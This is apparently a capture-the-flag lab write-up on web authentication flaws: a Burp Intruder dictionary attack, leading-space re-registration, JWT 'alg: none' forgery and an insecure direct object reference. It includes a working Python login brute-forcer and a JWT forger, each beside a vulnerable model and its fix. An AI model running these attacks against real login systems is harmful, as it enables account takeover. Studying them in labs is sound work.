Authenticate
Dictionary Attack
Let's first visit the webpage.
Now let's capture a login request in Burp Suite, using random credentials.
Send the request to Intruder, go to Positions, clear the default markers and mark only the password value as the payload position (Sniper attack type).
Now go to Payloads, load a password list, and click Start attack. Sort the results by Status or Length: the single attempt whose response differs from all the failed logins is the correct password.
We have the password. Let's log in as Jack and get the flag.
Now let's do the same, but for the user Mike.
We have the password. Let's log in as Mike and get the flag.
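The Intruder run above, reproduced as a script: establish a baseline with a password that cannot be right, then report the first wordlist entry whose response status or length deviates from it, which is exactly the signal the Status and Length columns give. This is an added example and not code from the room; the target URL, the form field names and the wordlist are assumptions.

```python
"""Dictionary attack against a login form (added example, not the room's code).
Assumed: the form POSTs 'username' and 'password', and a failed login always
produces the same response. URL and wordlist below are placeholders."""
import urllib.error
import urllib.parse
import urllib.request

# Constructed wordlist standing in for the list loaded into Intruder.
WORDLIST = ["123456", "password", "letmein", "qwerty", "welcome1", "sunshine"]


def post_login(url, username, password, timeout=5):
    """Send one login attempt as a form POST and return (status, body)."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        # A 401/403 is still a response worth comparing, not an error to abort on.
        return e.code, e.read().decode(errors="replace")


def find_password(attempt, wordlist, baseline_password="definitely-not-it-XyZ-9081"):
    """attempt(password) -> (status, body).

    Take one deliberately wrong attempt as the baseline, then return the first
    candidate whose status or body length differs from it (Intruder's
    Status/Length sort), or None if the whole list behaves like the baseline."""
    base_status, base_body = attempt(baseline_password)
    for candidate in wordlist:
        status, body = attempt(candidate)
        if status != base_status or len(body) != len(base_body):
            return candidate
    return None


if __name__ == "__main__":
    # Placeholder target; replace with the room's login URL.
    target = "http://TARGET_IP/login"
    user = "jack"
    print(find_password(lambda pw: post_login(target, user, pw), WORDLIST))
```

If the page echoes the submitted password back in the error message, body length will vary on every attempt; key on the presence of the failure string instead of the length in that case.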
Re-registration
Let's register as Darren, but with a space in front of the name. The duplicate-username check compares the raw string, so " darren" is accepted as a brand-new account.
Now let's log in as Darren with the space. The rest of the application trims the whitespace, so it resolves our account to the original Darren and shows his data.
Now let's do the same with the username Arthur.
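A constructed model of the flaw behind the re-registration trick above, beside the fix: the vulnerable store checks uniqueness on the raw username but strips whitespace when storing and looking up profile data, so " darren" and "darren" become two logins sharing one profile. The hardened version canonicalises once and keys every table on that form. This is an added example; the room's real backend is not shown, so the classes, the stored data and the flag string are assumptions.

```python
"""Leading-space re-registration: vulnerable model and fix (added example,
not the room's code). All data here is constructed."""


class VulnerableApp:
    """Registration checks the raw username, but profile storage and lookup
    strip whitespace (a trimming DB layer, or a later .strip()), so ' darren'
    and 'darren' are two accounts sharing one profile."""

    def __init__(self):
        self.users = {}      # raw username -> password
        self.profiles = {}   # stripped username -> private data

    def register(self, username, password):
        if username in self.users:          # ' darren' != 'darren': check passes
            raise ValueError("username taken")
        self.users[username] = password

    def login(self, username, password):
        return self.users.get(username) == password

    def set_profile(self, username, data):
        self.profiles[username.strip()] = data

    def profile(self, username):
        return self.profiles.get(username.strip())   # collapses both names


def canonical(username):
    """One canonical form, used at every boundary: trimmed and case-folded."""
    return username.strip().casefold()


class HardenedApp(VulnerableApp):
    """Normalise once, then key registration, login and profiles on that form."""

    def register(self, username, password):
        name = canonical(username)
        if not name:
            raise ValueError("empty username")
        if name in self.users:
            raise ValueError("username taken")   # ' darren' now collides
        self.users[name] = password

    def login(self, username, password):
        return self.users.get(canonical(username)) == password

    def set_profile(self, username, data):
        self.profiles[canonical(username)] = data

    def profile(self, username):
        return self.profiles.get(canonical(username))


def attempt_takeover(app):
    """Seed Darren's account, then try the leading-space re-registration.
    Returns whatever the attacker can read from Darren's profile, or None."""
    app.register("darren", "darrens-real-password")
    app.set_profile("darren", "FLAG{darren-private-data}")   # constructed
    try:
        app.register(" darren", "attacker-password")
    except ValueError:
        return None
    if not app.login(" darren", "attacker-password"):
        return None
    return app.profile(" darren")


if __name__ == "__main__":
    print("vulnerable:", attempt_takeover(VulnerableApp()))
    print("hardened:  ", attempt_takeover(HardenedApp()))
```

The same class of bug appears with case differences, Unicode confusables and trailing spaces ignored by database collations; the fix is the same, one canonical form applied before the uniqueness check and before every lookup.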
JSON Web Token
Let's follow the steps given in the room and use admin as the identity.
Let's first visit the webpage.
Type in a username and a password, capture the request in Burp, hit Go after capturing it and then click Forward. You should see a request carrying the JWT (if you don't, click Authenticate, forward that request and then click Go).
Now let's base64url-decode the first part of the token, the header.
Let's change "alg" to none and encode it again. A verifier that trusts the header's alg will then skip the signature check; strictly, an unsigned token has an empty third segment (it ends with a trailing dot), though a vulnerable verifier usually ignores whatever is left there.
Let's replace the old header with this one.
Now let's copy the second part of the token, the payload, and decode it.
Let's change the identity to 0, since admin accounts are usually created first and commonly carry id 0, then encode it and replace the original payload with it.
Now if you send the request you should get the admin flag. If you don't, copy the token from the room and replace the one in the request with it.
Once we forward the request, we get the flag.
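The forgery just performed by hand, carried out in code, beside the two verifiers that decide whether it works: one that believes the header's alg (and so accepts an unsigned token), and one that pins HS256 regardless of what the header says. This is an added example and not the room's code; the secret key, the claim name identity and the sample claims are assumptions, while the header/payload/signature layout and base64url encoding are standard JWT.

```python
"""JWT alg:none forgery and a pinned-algorithm verifier (added example, not
the room's code). SECRET and the claims are constructed."""
import base64
import hashlib
import hmac
import json

SECRET = b"assumed-server-secret"   # constructed; never known to the attacker


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header, payload, key):
    """What the server issues at login: header.payload.HMAC-SHA256 signature."""
    signing_input = f"{_segment(header)}.{_segment(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_alg_none(token, **new_claims):
    """Steps from the walkthrough: decode header, set alg to none, decode
    payload, overwrite claims (identity=0), re-encode, empty the signature."""
    h, p, _sig = token.split(".")
    header = json.loads(b64url_decode(h))
    payload = json.loads(b64url_decode(p))
    header["alg"] = "none"
    payload.update(new_claims)
    return f"{_segment(header)}.{_segment(payload)}."


def verify_vulnerable(token, key):
    """Trusts the alg named in the header: alg none means no signature check."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def verify_fixed(token, key):
    """Ignores the header's alg entirely and always demands a valid HS256 MAC."""
    h, p, s = token.split(".")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not s or not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    issued = sign_hs256({"typ": "JWT", "alg": "HS256"}, {"identity": 1}, SECRET)
    forged = forge_alg_none(issued, identity=0)
    print("forged:", forged)
    print("vulnerable verifier sees:", verify_vulnerable(forged, SECRET))
    try:
        verify_fixed(forged, SECRET)
    except ValueError as e:
        print("fixed verifier:", e)
```

Some libraries only reject the exact lowercase string none, so "None" or "NONE" in the header is worth trying when the plain form is refused; the fixed verifier above is immune to all of them because it never reads the alg field.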
No Authorization
Let's check the webpage.
Let's create a user called user with a random password.
Let's click Visit Private Space.
Looks like we are user 1, and the id is taken straight from the request. Let's change it to 0 and see what happens.
We have the flag and the password: the server returned user 0's record without ever checking that the requested id belongs to our session.
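A constructed model of the handler behind Visit Private Space: the vulnerable version checks that a session exists and then serves whatever id the request names, the fixed version binds the lookup to the id in the session and refuses any other. This is an added example and not the room's code; the user records, field names and flag string are assumptions.

```python
"""Insecure direct object reference on the private-space endpoint, and its
fix (added example, not the room's code). Records are constructed."""

USERS = {
    0: {"name": "admin", "password": "hunter2", "secret": "FLAG{admin-private-space}"},
    1: {"name": "user", "password": "random-pass", "secret": "nothing to see"},
}


def private_space_vulnerable(session, requested_id):
    """Authenticated? Yes. Authorised for that id? Never checked, so ?id=0
    from user 1's session hands over the admin record, password included."""
    if "user_id" not in session:
        raise PermissionError("login required")
    record = USERS.get(requested_id)
    if record is None:
        raise LookupError("no such user")
    return record


def private_space_fixed(session, requested_id):
    """Authorisation is decided by the session, not the request: the only id
    a caller may read is their own, and a mismatch is refused rather than
    silently redirected to the caller's own record (so the attempt is visible
    in logs)."""
    if "user_id" not in session:
        raise PermissionError("login required")
    if requested_id != session["user_id"]:
        raise PermissionError("not your record")
    record = dict(USERS[session["user_id"]])
    record.pop("password", None)   # passwords never belong in a response anyway
    return record


if __name__ == "__main__":
    sess = {"user_id": 1}          # we registered as 'user' and got id 1
    print("vulnerable, ?id=0:", private_space_vulnerable(sess, 0))
    try:
        private_space_fixed(sess, 0)
    except PermissionError as e:
        print("fixed, ?id=0:", e)
```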